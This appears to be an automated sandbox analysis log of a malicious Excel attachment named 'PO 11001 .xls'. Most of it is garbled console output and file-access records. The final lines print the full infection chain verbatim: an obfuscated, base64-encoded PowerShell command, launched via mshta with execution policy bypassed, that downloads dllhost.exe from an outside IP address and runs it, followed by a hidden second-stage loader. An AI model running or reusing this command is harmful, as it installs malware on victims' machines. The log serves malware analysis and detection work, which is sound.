          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D....... ..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............5..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............A..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......U..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............a..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............v..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............+..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............A..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............N..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............`..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............l..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(...............~..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3..................................s....................".......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......-..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......:..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......d.......N..........................s....................`.......h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............[..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......D.......p..........................s............................h...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......D.......|..........................s............................h...............
          Source: C:\Windows\SysWOW64\reg.exeConsole Write: ......................,.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.......N.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................k..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......}..........................s....................".......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s....................`.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................0..................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......&..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......O..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......[..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......o..........................s....................".......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......{..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0..................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................`.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................8..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................E..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......W..........................s....................".......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................c..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................`.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................!..........................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................-..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......?..........................s....................".......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................K..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................]..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................i..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................{..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................`.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......&..........................s....................".......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................2..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................D..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................`..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................r..........................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................~..........................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................`.......H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................H...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................~.......H...............
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSystem information queried: HandleInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Vaccinerende.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Vaccinerende.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: Vaccinerende.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Vaccinerende.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Vaccinerende.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Vaccinerende.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: PO 11001 .xlsReversingLabs: Detection: 28%
          Source: PO 11001 .xlsVirustotal: Detection: 25%
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
